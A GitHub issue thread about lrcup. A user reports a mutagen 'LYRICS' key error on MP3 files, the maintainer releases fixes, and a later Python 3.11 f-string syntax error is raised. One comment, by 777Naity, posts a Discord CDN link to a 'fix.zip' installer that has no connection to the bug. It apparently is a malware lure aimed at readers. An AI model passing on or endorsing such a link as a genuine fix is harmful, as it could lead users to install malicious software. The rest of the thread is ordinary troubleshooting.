### ISSUE TITLE
getting EasyID3KeyError: "'LYRICS' is not a valid key"

### ISSUE THREAD

**Issue by skj-skj** [iiPythonx/lrcup#1]
I am trying to upload the lyrics from the mp3 file but I getting this error:

mutagen.easyid3.EasyID3KeyError: "'LYRICS' is not a valid key"

I have attached a sample mp3 file to test.
[Foo.zip](https://github.com/user-attachments/files/16843883/Foo.zip)

Thanks.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by iiPythonx** [comment]
Might be fixed in 0.4.4 by 227fc08873f7304d7309bdd34b8cee117507cedd, feel free to try it again.  
I kind of rushed MP3 support so it might not work in other places just yet, I need to implement a better way of reading tags considering FLAC and MP3 are completely different.

**Comment by skj-skj** [comment]
@iiPythonx thanks for working on this so quickly.

I will try it soon when 0.4.4 will drop

**Comment by iiPythonx** [comment]
Sorry, I forgot to publish it when I made the fix; 0.4.4 just got published to PyPI.  
Right now, other functions in lrcup might not work for MP3 files other then the upload command, but I'll work on fixing that sometime tomorrow.

**Edit: I just published 0.5.0 which should fix everything related to MP3 files, feel free to try it out and lmk if you have any issues.**

**Comment by skj-skj** [comment]
@iiPythonx no problem, thanks for publishing the version.

I would suggest to step-up a github action, so that you don't have to take care of this manually.

**Comment by skj-skj** [comment]
I tried to upload using mp3 but I am getting the f-string syntax error.

```
File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/lrcup/audio/__init__.py", line 75
    f"[{str(math.floor(time / 60000)).zfill(2)}:{str(time / 1000).split(".")[0].zfill(2)}.{str(time / 1000).split(".")[1].zfill(2)}] {text}"
                                                                         ^
SyntaxError: f-string: unmatched '('
```

this is most probably a typo and you may have already figure it out by seeing the error.

that you have to use single quotes inside this f-string as this syntax only works in python 3.12+

I am using python 3.11
